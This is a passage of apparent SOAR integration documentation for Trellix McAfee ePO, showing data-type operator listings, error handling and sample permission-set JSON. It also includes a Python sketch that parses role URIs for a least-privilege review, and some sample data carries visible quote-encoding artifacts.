    "type": "\"[\\r\\n \\r\\n  \\\"udlp_redacted_text\\\",\\r\\n \\r\\n  \\\"fileName\\\",\\r\\n \\r\\n  \\\"udlp_opeScanRun_col\\\",\\r\\n \\r\\n  \\\"multiselect_group\\\",\\r\\n \\r\\n  \\\"megabytes\\\",\\r\\n \\r\\n  \\\"file_parent_hash\\\",\\r\\n \\r\\n  \\\"float\\\",\\r\\n \\r\\n  \\\"productVersion\\\",\\r\\n \\r\\n  \\\"list_tags\\\",\\r\\n \\r\\n  \\\"optionGroup_enum\\\",\\r\\n \\r\\n  \\\"datVersion\\\",\\r\\n \\r\\n  \\\"percentage\\\",\\r\\n \\r\\n  \\\"udlp_incident_justification_option_col\\\",\\r\\n \\r\\n  \\\"text\\\",\\r\\n \\r\\n  \\\"udlp_abstimestamp_withoffset_col\\\",\\r\\n \\r\\n  \\\"string_enum\\\",\\r\\n \\r\\n  \\\"policycolumn\\\",\\r\\n \\r\\n  \\\"self_signed\\\",\\r\\n \\r\\n  \\\"udlp_localized_lookup\\\",\\r\\n \\r\\n  \\\"group\\\",\\r\\n \\r\\n  \\\"isNotNull\\\",\\r\\n \\r\\n  \\\"engineVersion\\\",\\r\\n \\r\\n  \\\"udlp_string_enum\\\",\\r\\n \\r\\n  \\\"eventId\\\",\\r\\n \\r\\n  \\\"udlp_oneToManySingleSelect\\\",\\r\\n \\r\\n  \\\"udlp_abstimestamp_col\\\",\\r\\n \\r\\n  \\\"double\\\",\\r\\n \\r\\n  \\\"roleuri\\\",\\r\\n \\r\\n  \\\"compositeReputation\\\",\\r\\n \\r\\n  \\\"certUpdatedRepSummaryPostgresBytea\\\",\\r\\n \\r\\n  \\\"timespan\\\",\\r\\n \\r\\n  \\\"enum\\\",\\r\\n \\r\\n  \\\"udlp_durationMilliSeconds_col\\\",\\r\\n \\r\\n  \\\"int_select\\\",\\r\\n \\r\\n  \\\"udlp_ManyToMany\\\",\\r\\n \\r\\n  \\\"non_arithmetic_int\\\",\\r\\n \\r\\n  \\\"policynode\\\",\\r\\n \\r\\n  \\\"udlp_oneToMany\\\",\\r\\n \\r\\n  \\\"eventIdInt\\\",\\r\\n \\r\\n  \\\"string_lookup\\\",\\r\\n \\r\\n  \\\"udlp_ruleId_for_operational_116\\\",\\r\\n \\r\\n  \\\"udlp_fk_lookup_col\\\",\\r\\n \\r\\n  \\\"udlp_capture_search_col\\\",\\r\\n \\r\\n  \\\"applied_tags\\\",\\r\\n \\r\\n  \\\"percentagefromstring\\\",\\r\\n \\r\\n  \\\"string\\\",\\r\\n \\r\\n  \\\"children_count\\\",\\r\\n \\r\\n  \\\"udlp_case_resolution_col\\\",\\r\\n \\r\\n  \\\"udlp_string_lookup\\\",\\r\\n \\r\\n  \\\"boolean_success\\\",\\r\\n \\r\\n  
\\\"non_summable_int\\\",\\r\\n \\r\\n  \\\"long\\\",\\r\\n \\r\\n  \\\"mac\\\",\\r\\n \\r\\n  \\\"udlp_opeScan_col\\\",\\r\\n \\r\\n  \\\"ipv4\\\",\\r\\n \\r\\n  \\\"udlp_durationSeconds_col\\\",\\r\\n \\r\\n  \\\"ipv6\\\",\\r\\n \\r\\n  \\\"end_entity_certificate\\\",\\r\\n \\r\\n  \\\"udlp_mega_col\\\",\\r\\n \\r\\n  \\\"timestamp\\\",\\r\\n \\r\\n  \\\"udlp_abstimestamp_endpoint_col\\\",\\r\\n \\r\\n  \\\"certNewRepSummaryPostgresBytea\\\",\\r\\n \\r\\n  \\\"rules_names\\\",\\r\\n \\r\\n  \\\"discovery_inventory_classification\\\",\\r\\n \\r\\n  \\\"list_col\\\",\\r\\n \\r\\n  \\\"udlp_common_resolution_col\\\",\\r\\n \\r\\n  \\\"udlp_kilo_col\\\",\\r\\n \\r\\n  \\\"filePath\\\",\\r\\n \\r\\n  \\\"udlp_incident_justification_action_label_col\\\",\\r\\n \\r\\n  \\\"fileNewRepSummaryPostgresBytea\\\",\\r\\n \\r\\n  \\\"issue_type\\\",\\r\\n \\r\\n  \\\"udlp_epo_user_col\\\",\\r\\n \\r\\n  \\\"udlp_discovery_fileType_col\\\",\\r\\n \\r\\n  \\\"complianceQueryName\\\",\\r\\n \\r\\n  \\\"udlp_contains_words_col\\\",\\r\\n \\r\\n  \\\"int\\\",\\r\\n \\r\\n  \\\"udlp_discovery_scanRunId_col\\\",\\r\\n \\r\\n  \\\"threatcategory\\\",\\r\\n \\r\\n  \\\"udlp_reviewer_col\\\",\\r\\n \\r\\n  \\\"boolean\\\",\\r\\n \\r\\n  \\\"bytes\\\",\\r\\n \\r\\n  \\\"string_lookupWithResolver\\\",\\r\\n \\r\\n  \\\"udlp_common_status_col\\\",\\r\\n \\r\\n  \\\"udlp_searchable_text\\\",\\r\\n \\r\\n  \\\"udlp_InnerSelect\\\",\\r\\n \\r\\n  \\\"postgresBytea\\\",\\r\\n \\r\\n  \\\"fileUpdatedRepSummaryPostgresBytea\\\",\\r\\n \\r\\n  \\\"udlp_true_fileType_col\\\",\\r\\n \\r\\n  \\\"cert_impact\\\",\\r\\n \\r\\n  \\\"udlp_giga_col\\\"\\r\\n \\r\\n ]\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

type

operations

udlp_redacted_text

[

{

";name";: ";udlp_eq_redaction_op";,

";description";: ";udlp_eq_redaction_op";

}

]

fileName

[]

udlp_opeScanRun_col

[

{

";name";: ";udlp_ne_formatted_op";,

";description";: ";udlp_ne_formatted_op";

}

]

multiselect_group

[

{

";name";: ";childOf";,

";description";: ";childOf";

}

]

megabytes

[

{

";name";: ";lt";,

";description";: ";Less than";

}

]

file_parent_hash

[]

float

[

{

";name";: ";lt";,

";description";: ";Less than";

}

]

productVersion

[

{

";name";: ";not_isBlank";,

";description";: ";Value is not blank";

}

]

list_tags

[]

optionGroup_enum

[

{

";name";: ";eq";,

";description";: ";Equals";

}

]

datVersion

[

{

";name";: ";not_isBlank";,

";description";: ";Value is not blank";

}

]

percentage

[]

udlp_incident_justification_option_col

[

{

";name";: ";udlp_ne_formatted_op";,

";description";: ";udlp_ne_formatted_op";

}

]

text

[

{

";name";: ";endsWith";,

";description";: ";Ends with";

}

]

udlp_abstimestamp_withoffset_col

[

{

";name";: ";udlp_absNewerThanAbsolute_withoffset_op";,

";description";: ";udlp_absNewerThanAbsolute_withoffset_op";

}

]

string_enum

[

{

";name";: ";not_isBlank";,

";description";: ";Value is not blank";

},

{

";name";: ";isBlank";,

";description";: ";Value is blank";

}

]

policycolumn

[

{

";name";: ";eq";,

";description";: ";Equals";

},

{

";name";: ";ne";,

";description";: ";Does not equal";

}

]

self_signed

[]

udlp_localized_lookup

[

{

";name";: ";udlp_eq_localized_op";,

";description";: ";udlp_eq_localized_op";

}

]

group

[

{

";name";: ";childOf";,

";description";: ";childOf";

}

]

isNotNull

[

{

";name";: ";isNotNullTrueFalse";,

";description";: ";isNotNullTrueFalse";

}

]

engineVersion

[

{

";name";: ";version_eq";,

";description";: ";version_eq";

}

]

udlp_string_enum

[]

eventId

[

{

";name";: ";not_isBlank";,

";description";: ";Value is not blank";

}

]

udlp_oneToManySingleSelect

[

{

";name";: ";udlp_oneToManySingleSelect_not_equal_op";,

";description";: ";udlp_oneToManySingleSelect_not_equal_op";

}

]

udlp_abstimestamp_col

[

{

";name";: ";not_isBlank";,

";description";: ";Value is not blank";

}

]

double

[

{

";name";: ";lt";,

";description";: ";Less than";

}

]

roleuri

[]

compositeReputation

[]

certUpdatedRepSummaryPostgresBytea

[]

timespan

[]

enum

[

{

";name";: ";not_isBlank";,

";description";: ";Value is not blank";

}

]

udlp_durationMilliSeconds_col

[

{

";name";: ";le";,

";description";: ";Less than or equals";

}

]

int_select

[

{

";name";: ";lt";,

";description";: ";Less than";

}

]

udlp_ManyToMany

[

{

";name";: ";udlp_many2many_equal_op";,

";description";: ";udlp_many2many_equal_op";

}

]

non_arithmetic_int

[]

policynode

[
    {
        "name": "policynodeDescendsFrom",
        "description": "policynodeDescendsFrom"
    }
]

udlp_oneToMany

[
    {
        "name": "udlp_oneToMany_not_equal_op",
        "description": "udlp_oneToMany_not_equal_op"
    },
    {
        "name": "udlp_oneToMany_equal_op",
        "description": "udlp_oneToMany_equal_op"
    }
]

eventIdInt

[
    {
        "name": "in",
        "description": "in"
    }
]

string_lookup

[
    {
        "name": "not_isBlank",
        "description": "Value is not blank"
    }
]

udlp_ruleId_for_operational_116

[
    {
        "name": "udlp_rule_id_contains_sexp",
        "description": "udlp_rule_id_contains_sexp"
    }
]

udlp_fk_lookup_col

[
    {
        "name": "udlp_ne_formatted_op",
        "description": "udlp_ne_formatted_op"
    },
    {
        "name": "udlp_eq_formatted_op",
        "description": "udlp_eq_formatted_op"
    }
]

udlp_capture_search_col

[
    {
        "name": "eq",
        "description": "Equals"
    }
]

applied_tags

[
    {
        "name": "hasTagExcluded",
        "description": "hasTagExcluded"
    }
]

percentagefromstring

[]

string

[
    {
        "name": "not_isBlank",
        "description": "Value is not blank"
    }
]

children_count

[]

udlp_case_resolution_col

[
    {
        "name": "udlp_ne_formatted_op",
        "description": "udlp_ne_formatted_op"
    },
    {
        "name": "udlp_eq_formatted_op",
        "description": "udlp_eq_formatted_op"
    }
]

udlp_string_lookup

[
    {
        "name": "udlp_eq_localized_op",
        "description": "udlp_eq_localized_op"
    }
]

boolean_success

[
    {
        "name": "eq",
        "description": "Equals"
    },
    {
        "name": "ne",
        "description": "Does not equal"
    }
]

non_summable_int

[]

long

[
    {
        "name": "lt",
        "description": "Less than"
    }
]

mac

[
    {
        "name": "mac_not_match_any",
        "description": "Does not match any of the following"
    }
]

udlp_opeScan_col

[
    {
        "name": "udlp_ne_formatted_op",
        "description": "udlp_ne_formatted_op"
    }
]

ipv4

[
    {
        "name": "not_isBlank",
        "description": "Value is not blank"
    }
]

udlp_durationSeconds_col

[
    {
        "name": "le",
        "description": "Less than or equals"
    }
]

ipv6

[
    {
        "name": "not_isBlank",
        "description": "Value is not blank"
    }
]

end_entity_certificate

[]

udlp_mega_col

[
    {
        "name": "udlp_mega_gt",
        "description": "udlp_mega_gt"
    }
]

timestamp

[
    {
        "name": "not_isBlank",
        "description": "Value is not blank"
    }

udlp_abstimestamp_endpoint_col

[
    {
        "name": "udlp_absNewerThanAbsolute_op",
        "description": "udlp_absNewerThanAbsolute_op"
    }
]

certNewRepSummaryPostgresBytea

[]

rules_names

[]

discovery_inventory_classification

[
    {
        "name": "discovery_inventory_with_classification_op",
        "description": "discovery_inventory_with_classification_op"
    }
]

list_col

[]

udlp_common_resolution_col

[
    {
        "name": "udlp_eq_resolution_op",
        "description": "udlp_eq_resolution_op"
    }
]

udlp_kilo_col

[
    {
        "name": "udlp_kilo_gt",
        "description": "udlp_kilo_gt"
    }
]

filePath

[
    {
        "name": "not_isBlank",
        "description": "Value is not blank"
    }
]

udlp_incident_justification_action_label_col

[

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
| --- | --- | --- |
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | List Data Type failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 401. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Unauthorized. |

Error Sample Data

List Data Type failed.

Status Code: 401.

Message: Unauthorized.

List Permission Set

Retrieves a list of permission sets.

Input

N/A

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
{
    "list": {
        "@id": "1",
        "permissionSet": [
            {
                "@id": "2",
                "name": "Global Reviewer",
                "roles": {
                    "role": [
                        {
                            "roleUri": "role:ENDP_FW_META.ENDP_FW_META_FW.reviewer"
                        },
                        {
                            "roleUri": "role:EPOAGENTMETA.tasks.reviewer"
                        },
                        {
                            "roleUri": "role:MVEDR___META.MVEDR___META.reviewer"
                        },
                        {
                            "roleUri": "role:epo.core.view.tree"
                        },
                        {
                            "roleUri": "role:core.dash.viewer"
                        },
                        {
                            "roleUri": "role:MARCOBA_META.MARCOBA_META.reviewer"
                        },
                        {
                            "roleUri": "role:MVEDR___META.tasks.reviewer"
                        },
                        {
                            "roleUri": "role:issue.auditor?type=issue.type.untyped"
                        },
                        {
                            "roleUri": "role:TIEMGMT_META.TIEMGMT_META.reviewer"
                        },
                        {
                            "roleUri": "role:MARCOBA_META.tasks.reviewer"
                        },
                        {
                            "roleUri": "role:DXLCLNT_META.DXLCLNT_META.reviewer"
                        },
                        {
                            "roleUri": "role:softman.viewOnly"
                        },
                        {
                            "roleUri": "role:ENDP_WP_1000.tasks.reviewer"
                        },
                        {
                            "roleUri": "role:ENDP_GS_1000.ENDP_GS_1000.reviewer"
                        },
                        {
                            "roleUri": "role:epo.dir.access",
                            "customRoleInfo": {
                                "@roleFactoryId": "epo.dir",
                                "systems": {
                                    "system": "\\\\"
                                }
                            }
                        },
                        {
                            "roleUri": "role:ENDP_AM_1000.tasks.reviewer"
                        },
                        {
                            "roleUri": "role:response.rule.user"
                        },
                        {
                            "roleUri": "role:EPOAGENTMETA.EPOAGENTMETA.reviewer"
                        },
                        {
                            "roleUri": "role:ahRole.viewOnly"
                        },
                        {
                            "roleUri": "role:rs.user"
                        },
                        {
                            "roleUri": "role:core.audit.reviewer"
                        },
                        {
                            "roleUri": "role:DXLBROKRMETA.DXLBROKRMETA.reviewer"
                        },
                        {
                            "roleUri": "role:core.query.guest"
                        },
                        {
                            "roleUri": "role:ENDP_AM_1000.ENDP_AM_1000.reviewer"
                        },
                        {
                            "roleUri": "role:TIEClientMETA.TIEClientMETA.reviewer"
                        },
                        {
                            "roleUri": "role:rollup.execute"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.UDLPSRVR2013.reviewer"
                        },
                        {
                            "roleUri": "role:core.addressbook.guest"
                        },
                        {
                            "roleUri": "role:MCPSRVER1000.MCPSRVER1000.reviewer"
                        },
                        {
                            "roleUri": "role:ENDP_WP_1000.ENDP_WP_1000.reviewer"
                        },
                        {
                            "roleUri": "role:epo.productevents.view"
                        },
                        {
                            "roleUri": "role:ubpRole.viewOnly"
                        },
                        {
                            "roleUri": "role:repoRole.distViewOnly"
                        },
                        {
                            "roleUri": "role:epo.event.view"
                        },
                        {
                            "roleUri": "role:notes.viewOnly"
                        },
                        {
                            "roleUri": "role:scheduler.view"
                        },
                        {
                            "roleUri": "role:repoRole.masterViewOnly"
                        },
                        {
                            "roleUri": "role:ENDP_GS_1000.tasks.reviewer"
                        }
                    ]
                }
            },
            {
                "@id": "3",
                "name": "Group Reviewer",
                "roles": {
                    "role": [
                        {
                            "roleUri": "role:core.addressbook.guest"
                        },
                        {
                            "roleUri": "role:core.dash.viewer"
                        },
                        {
                            "roleUri": "role:epo.productevents.view"
                        },
                        {
                            "roleUri": "role:scheduler.view"
                        },
                        {
                            "roleUri": "role:epo.event.view"
                        },
                        {
                            "roleUri": "role:notes.viewOnly"
                        },
                        {
                            "roleUri": "role:core.query.guest"
                        },
                        {
                            "roleUri": "role:epo.core.view.tree"
                        },
                        {
                            "roleUri": "role:response.rule.user"
                        }
                    ]
                }
            },
            {
                "@id": "4",
                "name": "Executive Reviewer",
                "roles": {
                    "role": [
                        {
                            "roleUri": "role:epo.productevents.view"
                        },
                        {
                            "roleUri": "role:core.query.guest"
                        },
                        {
                            "roleUri": "role:epo.dir.access",
                            "customRoleInfo": {
                                "@roleFactoryId": "epo.dir",
                                "systems": {
                                    "system": "\\\\"
                                }
                            }
                        },
                        {
                            "roleUri": "role:core.dash.viewer"
                        },
                        {
                            "roleUri": "role:core.addressbook.guest"
                        },
                        {
                            "roleUri": "role:epo.event.view"
                        }
                    ]
                }
            },
            {
                "@id": "5",
                "name": "MCP Catalog Admin",
                "roles": {
                    "role": [
                        {
                            "roleUri": "role:common.catalog.data.general?catalogId=69c1e34e-ede8-43ae-95b0-e731d177cdab&itemTypeId8=perm.EDIT&itemTypeId102=perm.EDIT&itemTypeId201=perm.EDIT&itemTypeId20=perm.EDIT"
                        },
                        {
                            "roleUri": "role:common.catalog.data.general?catalogId=00000000-0000-0000-0000-000000000000&itemTypeId8=perm.EDIT&itemTypeId102=perm.EDIT&itemTypeId201=perm.EDIT&itemTypeId20=perm.EDIT"
                        },
                        {
                            "roleUri": "role:common.catalog.actions.general?exportFile=&importFromCatalog=&createCatalog=&deleteCatalog=&importFromFile="
                        },
                        {
                            "roleUri": "role:MCPSRVER1000.MCPSRVER1000.admin"
                        }
                    ]
                }
            },
            {
                "@id": "6",
                "name": "Group Active Response Editor",
                "roles": {
                    "role": [
                        {
                            "roleUri": "role:mar-server.reactionRole.write"
                        },
                        {
                            "roleUri": "role:mar-server.searchRole.write"
                        },
                        {
                            "roleUri": "role:MARCOBA_META.MARCOBA_META.admin"
                        },
                        {
                            "roleUri": "role:mar-server.collectorRole.write"
                        },
                        {
                            "roleUri": "role:epo.event.view"
                        },
                        {
                            "roleUri": "role:mar-server.triggerRole.write"
                        }
                    ]
                }
            },
            {
                "@id": "7",
                "name": "Group Active Response Responder",
                "roles": {
                    "role": [
                        {
                            "roleUri": "role:mar-server.searchRole.write"
                        },
                        {
                            "roleUri": "role:MARCOBA_META.MARCOBA_META.reviewer"
                        },
                        {
                            "roleUri": "role:mar-server.triggerRole.read"
                        },
                        {
                            "roleUri": "role:epo.event.view"
                        },
                        {
                            "roleUri": "role:mar-server.reactionRole.read"
                        },
                        {
                            "roleUri": "role:mar-server.collectorRole.read"
                        }
                    ]
                }
            },
            {
                "@id": "8",
                "name": "Group Active Response Workspace Monitor",
                "roles": {
                    "role": [
                        {
                            "roleUri": "role:mar-server.searchRole.read"
                        },
                        {
                            "roleUri": "role:mar-workspace.workspace.read"
                        },
                        {
                            "roleUri": "role:mar-server.collectorRole.read"
                        },
                        {
                            "roleUri": "role:tie.viewer"
                        }
                    ]
                }
            },
            {
                "@id": "9",
                "name": "Group Active Response Workspace Responder",
                "roles": {
                    "role": [
                        {
                            "roleUri": "role:mar-server.triggerRole.write"
                        },
                        {
                            "roleUri": "role:mar-server.reactionRole.run"
                        },
                        {
                            "roleUri": "role:mar-server.searchRole.write"
                        },
                        {
                            "roleUri": "role:mar-server.collectorRole.write"
                        },
                        {
                            "roleUri": "role:tie.manager"
                        },
                        {
                            "roleUri": "role:mar-workspace.workspace.write"
                        },
                        {
                            "roleUri": "role:mar-server.reactionRole.write"
                        }
                    ]
                }
            },
            {
                "@id": "10",
                "name": "Group MVISION EDR FW",
                "roles": {
                    "role": {
                        "roleUri": "role:copperfieldFw.write"
                    }
                }
            },
            {
                "@id": "11",
                "name": "Group Admin",
                "roles": {
                    "role": [
                        {
                            "roleUri": "role:udlp.helpDesk.actions.agentOverrideKey.creator"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.operational.reviewer.full"
                        },
                        {
                            "roleUri": "role:udlp.helpDesk.actions.agentUninstallKey.creator"
                        },
                        {
                            "roleUri": "role:core.addressbook.admin"
                        },
                        {
                            "roleUri": "role:core.dash.user"
                        },
                        {
                            "roleUri": "role:epo.core.modify.tree"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.policy.list?masterPerm=VIEW"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.incident.task?email=true&purge=true&setReviewer=true"
                        },
                        {
                            "roleUri": "role:epo.productevents.view"
                        },
                        {
                            "roleUri": "role:scheduler.view"
                        },
                        {
                            "roleUri": "role:epo.core.deploy.agent"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.ruleSet.list?masterPerm=FULL"
                        },
                        {
                            "roleUri": "role:epo.event.view"
                        },
                        {
                            "roleUri": "role:notes.overRide"
                        },
                        {
                            "roleUri": "role:epo.core.tagcat.user"
                        },
                        {
                            "roleUri": "role:ubpRole.viewOnly"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.definition.list?itemTypeId80=perm.FULL&itemTypeId81=perm.FULL&itemTypeId9=perm.FULL&itemTypeId82=perm.FULL&itemTypeId8=perm.FULL&itemTypeId83=perm.FULL&itemTypeId84=perm.FULL&itemTypeId85=perm.FULL&itemTypeId20=perm.FULL&itemTypeId86=perm.FULL&itemTypeId1000=perm.FULL&itemTypeId21=perm.FULL&itemTypeId87=perm.FULL&itemTypeId88=perm.FULL&itemTypeId23=perm.FULL&itemTypeId24=perm.FULL&itemTypeId26=perm.FULL&catalogId=d3ab4ed4-efab-48d2-840d-714cbf76b888&itemTypeId3=perm.FULL&itemTypeId2=perm.FULL&itemTypeId1=perm.FULL&itemTypeId0=perm.FULL&itemTypeId6=perm.FULL&itemTypeId5=perm.FULL&itemTypeId4=perm.FULL&itemTypeId90=perm.FULL&itemTypeId91=perm.FULL&itemTypeId92=perm.FULL&itemTypeId93=perm.FULL&itemTypeId94=perm.FULL&itemTypeId10=perm.FULL&itemTypeId2000=perm.FULL&itemTypeId11=perm.FULL&itemTypeId12=perm.FULL&itemTypeId103=perm.FULL&itemTypeId79=perm.FULL&itemTypeId15=perm.FULL&itemTypeId100=perm.FULL&itemTypeId16=perm.FULL&itemTypeId17=perm.FULL&itemTypeId102=perm.FULL&itemTypeId101=perm.FULL"
                        },
                        {
                            "roleUri": "role:ahRole.viewOnly"
                        },
                        {
                            "roleUri": "role:repoRole.distViewOnly"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.incident.reviewer.full?skyhigh=true"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.operational.task?email=true&purge=true&setReviewer=true"
                        },
                        {
                            "roleUri": "role:repoRole.masterViewOnly"
                        },
                        {
                            "roleUri": "role:epo.core.view.tree"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.incident.redaction?view=true&reveal=true"
                        },
                        {
                            "roleUri": "role:epo.event.admin"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.discover.main.full"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.case.reviewer.full"
                        },
                        {
                            "roleUri": "role:response.rule.admin"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.capture.main.full"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.incident.evidence?viewFile=true&viewMatch=true"
                        },
                        {
                            "roleUri": "role:udlp.helpDesk.actions.agentReleaseFromQuarantineKey.creator"
                        },
                        {
                            "roleUri": "role:udlp.helpDesk.actions.masterReleaseKey.creator"
                        },
                        {
                            "roleUri": "role:notes.fullPerms"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.classification.action?regDocsAndWhitelist=true&manualClassification=true"
                        },
                        {
                            "roleUri": "role:core.audit.reviewer"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.incident.type?endpointDiscovery=true&data=true&device=true&discovery=true&skyhigh=true"
                        },
                        {
                            "roleUri": "role:epo.core.wakeup.agent"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.classification.list?masterPerm=FULL"
                        },
                        {
                            "roleUri": "role:epo.core.tag.assign"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.dlp.settings?advancedTab=true&skyhighTab=true&caseTab=true&backupRestoreTab=true&generalTab=true&incidentTab=true&operationalTab=true"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.rule.type.full?data=true&device=true&discovery=true"
                        },
                        {
                            "roleUri": "role:core.query.user"
                        }
                    ]
                }
            }
        ]
    }
}
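Added example (not part of the D3 or Trellix documentation): a Python sketch that walks the List Permission Set Raw Data for a least-privilege review. It handles two quirks visible in the sample above: `roles.role` is a single object rather than an array when a set has only one role, and a `roleUri` can carry grants in its query string. The function names, the trimmed sample and the suffix and value lists used for flagging are assumptions chosen for illustration; what each role actually grants is defined by ePO.

```python
import json
from urllib.parse import parse_qsl

# Constructed sample: three permission sets trimmed from the Raw Data shape above.
SAMPLE_RAW = json.loads(r'''
{
  "list": {
    "@id": "1",
    "permissionSet": [
      {"@id": "3", "name": "Group Reviewer", "roles": {"role": [
        {"roleUri": "role:core.dash.viewer"},
        {"roleUri": "role:epo.event.view"}
      ]}},
      {"@id": "5", "name": "MCP Catalog Admin", "roles": {"role": [
        {"roleUri": "role:common.catalog.data.general?catalogId=00000000-0000-0000-0000-000000000000&itemTypeId8=perm.EDIT"},
        {"roleUri": "role:MCPSRVER1000.MCPSRVER1000.admin"}
      ]}},
      {"@id": "10", "name": "Group MVISION EDR FW", "roles": {"role":
        {"roleUri": "role:copperfieldFw.write"}
      }}
    ]
  }
}
''')

# Assumption: name-based triage heuristic, not an authoritative ePO privilege map.
ELEVATED_SUFFIXES = (".admin", ".write", ".run", ".full")
ELEVATED_PARAM_VALUES = {"perm.EDIT", "perm.FULL", "FULL"}


def as_list(value):
    """Normalise a field that is an object for one item and an array for many."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def parse_role_uri(role_uri):
    """Split 'role:<name>?<k=v&...>' into (name, params)."""
    body = role_uri[len("role:"):] if role_uri.startswith("role:") else role_uri
    name, _, query = body.partition("?")
    # keep_blank_values keeps flags such as 'exportFile=' that have no value
    return name, dict(parse_qsl(query, keep_blank_values=True))


def elevated_reasons(role_uri):
    """Return the parts of one roleUri that the heuristic treats as elevated."""
    name, params = parse_role_uri(role_uri)
    reasons = []
    if name.endswith(ELEVATED_SUFFIXES):
        reasons.append(name)
    for key, value in sorted(params.items()):
        if value in ELEVATED_PARAM_VALUES:
            reasons.append(f"{name}?{key}={value}")
    return reasons


def audit_permission_sets(raw):
    """Map each permission set name to the role grants flagged for review."""
    report = {}
    for pset in as_list(raw.get("list", {}).get("permissionSet")):
        flagged = []
        for role in as_list((pset.get("roles") or {}).get("role")):
            flagged.extend(elevated_reasons(role.get("roleUri", "")))
        report[pset.get("name", pset.get("@id"))] = flagged
    return report


if __name__ == "__main__":
    for set_name, grants in audit_permission_sets(SAMPLE_RAW).items():
        print(set_name, "->", grants or "no elevated grants flagged")
```

A playbook step that indexes `roles.role` as an array without this normalisation would fail on, or silently skip, single-role sets such as "Group MVISION EDR FW".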
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "@id": "2",
        "name": "Global Reviewer",
        "roles": {
            "role": [
                {
                    "roleUri": "role:ENDP_FW_META.ENDP_FW_META_FW.reviewer"
                },
                {
                    "roleUri": "role:EPOAGENTMETA.tasks.reviewer"
                },
                {
                    "roleUri": "role:MVEDR___META.MVEDR___META.reviewer"
                },
                {
                    "roleUri": "role:epo.core.view.tree"
                },
                {
                    "roleUri": "role:core.dash.viewer"
                },
                {
                    "roleUri": "role:MARCOBA_META.MARCOBA_META.reviewer"
                },
                {
                    "roleUri": "role:MVEDR___META.tasks.reviewer"
                },
                {
                    "roleUri": "role:issue.auditor?type=issue.type.untyped"
                },
                {
                    "roleUri": "role:TIEMGMT_META.TIEMGMT_META.reviewer"
                },
                {
                    "roleUri": "role:MARCOBA_META.tasks.reviewer"
                },
                {
                    "roleUri": "role:DXLCLNT_META.DXLCLNT_META.reviewer"
                },
                {
                    "roleUri": "role:softman.viewOnly"
                },
                {
                    "roleUri": "role:ENDP_WP_1000.tasks.reviewer"
                },
                {
                    "roleUri": "role:ENDP_GS_1000.ENDP_GS_1000.reviewer"
                },
                {
                    "roleUri": "role:epo.dir.access",
                    "customRoleInfo": {
                        "@roleFactoryId": "epo.dir",
                        "systems": {
                            "system": "\\"
                        }
                    }
                },
                {
                    "roleUri": "role:ENDP_AM_1000.tasks.reviewer"
                },
                {
                    "roleUri": "role:response.rule.user"
                },
                {
                    "roleUri": "role:EPOAGENTMETA.EPOAGENTMETA.reviewer"
                },
                {
                    "roleUri": "role:ahRole.viewOnly"
                },
                {
                    "roleUri": "role:rs.user"
                },
                {
                    "roleUri": "role:core.audit.reviewer"
                },
                {
                    "roleUri": "role:DXLBROKRMETA.DXLBROKRMETA.reviewer"
                },
                {
                    "roleUri": "role:core.query.guest"
                },
                {
                    "roleUri": "role:ENDP_AM_1000.ENDP_AM_1000.reviewer"
                },
                {
                    "roleUri": "role:TIEClientMETA.TIEClientMETA.reviewer"
                },
                {
                    "roleUri": "role:rollup.execute"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.UDLPSRVR2013.reviewer"
                },
                {
                    "roleUri": "role:core.addressbook.guest"
                },
                {
                    "roleUri": "role:MCPSRVER1000.MCPSRVER1000.reviewer"
                },
                {
                    "roleUri": "role:ENDP_WP_1000.ENDP_WP_1000.reviewer"
                },
                {
                    "roleUri": "role:epo.productevents.view"
                },
                {
                    "roleUri": "role:ubpRole.viewOnly"
                },
                {
                    "roleUri": "role:repoRole.distViewOnly"
                },
                {
                    "roleUri": "role:epo.event.view"
                },
                {
                    "roleUri": "role:notes.viewOnly"
                },
                {
                    "roleUri": "role:scheduler.view"
                },
                {
                    "roleUri": "role:repoRole.masterViewOnly"
                },
                {
                    "roleUri": "role:ENDP_GS_1000.tasks.reviewer"
                }
            ]
        }
    },
    {
        "@id": "3",
        "name": "Group Reviewer",
        "roles": {
            "role": [
                {
                    "roleUri": "role:core.addressbook.guest"
                },
                {
                    "roleUri": "role:core.dash.viewer"
                },
                {
